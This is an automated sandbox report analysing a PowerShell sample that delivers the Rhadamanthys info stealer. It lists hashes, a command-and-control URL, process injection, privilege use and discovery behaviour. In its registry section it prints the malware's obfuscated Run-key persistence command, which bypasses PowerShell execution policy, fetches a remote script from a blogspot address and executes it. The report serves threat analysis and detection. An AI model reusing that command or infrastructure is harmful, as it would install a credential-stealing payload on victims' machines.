Analysis
-
max time kernel
94s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2025, 17:58
Static task
static1
Behavioral task
behavioral1
Sample
ddd.ps1
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
ddd.ps1
Resource
win10v2004-20250217-en
General
-
Target
ddd.ps1
-
Size
2.4MB
-
MD5
5b322ca0eb9655beaf39e4453d141cd2
-
SHA1
b556cbaf50c2b77fd73d4386f068f0bbffe7504d
-
SHA256
b2082d4666cd9eb57896b04058438fad6a268e504d877b908ae276b3c68799fe
-
SHA512
0648609146167599498b41bdb97c02eb0947ba03e44ee63c3448bd6b2508b4bd7054a63671c12120b01240bba810489da68e3f79dc2a7674447ad760127dcc1b
-
SSDEEP
1536:P26vgn00oR/S7rdvtk76qu6p5LSTFPNWdD7uHzgjw8b560jSKkjptOVNjC5GGQli:bYf
Malware Config
Extracted
rhadamanthys
https://94.156.71.221:1485/ba9365b02ebb09b86/kscmx9w7.etux2
Signatures
-
Detects Rhadamanthys payload 1 IoCs
resource yara_rule behavioral2/memory/1464-37-0x0000000001100000-0x00000000011B2000-memory.dmp Rhadamanthys_v8 -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1464 created 3056 1464 RegSvcs.exe 51 -
Deletes itself 1 IoCs
pid Process 2624 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Desdwnessr2 = "mshta \"javascript:zw=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm hotelmainrat2024.blogspot.com/hegegehe | iex);Start-Sleep -Seconds 5;','run']; oz=[zw[3],zw[0],zw[1],zw[2]]; new ActiveXObject(oz[2])[oz[0]](oz[3], 0, true);close();new ActiveXObject(oz[1]).DeleteFile(WScript.ScriptFullName);\"\r\n" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defswadswner1 = "schtasks /run /tn Defswadswner1" powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2624 set thread context of 1464 2624 powershell.exe 95 PID 2624 set thread context of 628 2624 powershell.exe 96 PID 2624 set thread context of 4228 2624 powershell.exe 97 PID 2624 set thread context of 5108 2624 powershell.exe 98 PID 2624 set thread context of 3592 2624 powershell.exe 99 PID 2624 set thread context of 5088 2624 powershell.exe 100 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
pid Process 2624 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 1464 RegSvcs.exe 1464 RegSvcs.exe 5000 openwith.exe 5000 openwith.exe 5000 openwith.exe 5000 openwith.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2624 powershell.exe Token: SeRestorePrivilege 4076 dw20.exe Token: SeBackupPrivilege 4076 dw20.exe Token: SeBackupPrivilege 4076 dw20.exe Token: SeBackupPrivilege 4076 dw20.exe Token: SeBackupPrivilege 4076 dw20.exe Token: SeBackupPrivilege 2924 dw20.exe Token: SeBackupPrivilege 2924 dw20.exe Token: SeBackupPrivilege 316 dw20.exe Token: SeBackupPrivilege 316 dw20.exe Token: SeBackupPrivilege 1188 dw20.exe Token: SeBackupPrivilege 1188 dw20.exe Token: SeIncreaseQuotaPrivilege 2624 powershell.exe Token: SeSecurityPrivilege 2624 powershell.exe Token: SeTakeOwnershipPrivilege 2624 powershell.exe Token: SeLoadDriverPrivilege 2624 powershell.exe Token: SeSystemProfilePrivilege 2624 powershell.exe Token: SeSystemtimePrivilege 2624 powershell.exe Token: SeProfSingleProcessPrivilege 2624 powershell.exe Token: SeIncBasePriorityPrivilege 2624 powershell.exe Token: SeCreatePagefilePrivilege 2624 powershell.exe Token: SeBackupPrivilege 2624 powershell.exe Token: SeRestorePrivilege 2624 powershell.exe Token: SeShutdownPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeSystemEnvironmentPrivilege 2624 powershell.exe Token: SeRemoteShutdownPrivilege 2624 powershell.exe Token: SeUndockPrivilege 2624 powershell.exe Token: SeManageVolumePrivilege 2624 powershell.exe Token: 33 2624 powershell.exe Token: 34 2624 powershell.exe Token: 35 2624 powershell.exe Token: 36 2624 powershell.exe Token: SeIncreaseQuotaPrivilege 2624 powershell.exe Token: SeSecurityPrivilege 2624 powershell.exe Token: SeTakeOwnershipPrivilege 2624 powershell.exe Token: SeLoadDriverPrivilege 2624 powershell.exe Token: SeSystemProfilePrivilege 2624 powershell.exe Token: SeSystemtimePrivilege 2624 powershell.exe Token: SeProfSingleProcessPrivilege 2624 powershell.exe Token: SeIncBasePriorityPrivilege 2624 powershell.exe Token: SeCreatePagefilePrivilege 2624 powershell.exe Token: SeBackupPrivilege 2624 powershell.exe Token: SeRestorePrivilege 2624 powershell.exe Token: SeShutdownPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeSystemEnvironmentPrivilege 2624 powershell.exe Token: SeRemoteShutdownPrivilege 2624 powershell.exe Token: SeUndockPrivilege 2624 powershell.exe Token: SeManageVolumePrivilege 2624 powershell.exe Token: 33 2624 powershell.exe Token: 34 2624 powershell.exe Token: 35 2624 powershell.exe Token: 36 2624 powershell.exe Token: SeIncreaseQuotaPrivilege 2624 powershell.exe Token: SeSecurityPrivilege 2624 powershell.exe Token: SeTakeOwnershipPrivilege 2624 powershell.exe Token: SeLoadDriverPrivilege 2624 powershell.exe Token: SeSystemProfilePrivilege 2624 powershell.exe Token: SeSystemtimePrivilege 2624 powershell.exe Token: SeProfSingleProcessPrivilege 2624 powershell.exe Token: SeIncBasePriorityPrivilege 2624 powershell.exe Token: SeCreatePagefilePrivilege 2624 powershell.exe Token: SeBackupPrivilege 2624 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 1464 2624 powershell.exe 95 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 628 2624 powershell.exe 96 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 4228 2624 powershell.exe 97 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 5108 2624 powershell.exe 98 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 3592 2624 powershell.exe 99 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 2624 wrote to memory of 5088 2624 powershell.exe 100 PID 4228 wrote to memory of 2924 4228 RegSvcs.exe 101 PID 4228 wrote to memory of 2924 4228 RegSvcs.exe 101 PID 4228 wrote to memory of 2924 4228 RegSvcs.exe 101 PID 5108 wrote to memory of 4076 5108 RegSvcs.exe 102 PID 5108 wrote to memory of 4076 5108 RegSvcs.exe 102 PID 5108 wrote to memory of 4076 5108 RegSvcs.exe 102 PID 5088 wrote to memory of 1188 5088 Msbuild.exe 103 PID 5088 wrote to memory of 1188 5088 Msbuild.exe 103 PID 5088 wrote to memory of 1188 5088 Msbuild.exe 103 PID 3592 wrote to memory of 316 3592 Msbuild.exe 104 PID 3592 wrote to memory of 316 3592 Msbuild.exe 104 PID 3592 wrote to memory of 316 3592 Msbuild.exe 104 PID 1464 wrote to memory of 5000 1464 RegSvcs.exe 106 PID 1464 wrote to memory of 5000 1464 RegSvcs.exe 106 PID 1464 wrote to memory of 5000 1464 RegSvcs.exe 106 PID 1464 wrote to memory of 5000 1464 RegSvcs.exe 106
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3056
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ddd.ps11⤵
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1464
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7803⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7563⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7843⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7803⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
315B
MD5f1fca28ac1e609a12e5841cb73e952ab
SHA17a06e4143f96a201b87d9532190a33fd166a588d
SHA256c2bcaf768331a524e6c79bad2aa8f0052741a48f54b5eaba92fa6c0c81f5f60a
SHA5123b40490aaa91d4fc76de628ecf94d0dc180fecc48178c256e8c735ffdecf2613666021b450dc00273daae7c19c7bd54864be93f4b5575469c7dc7b8edfe54f84
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82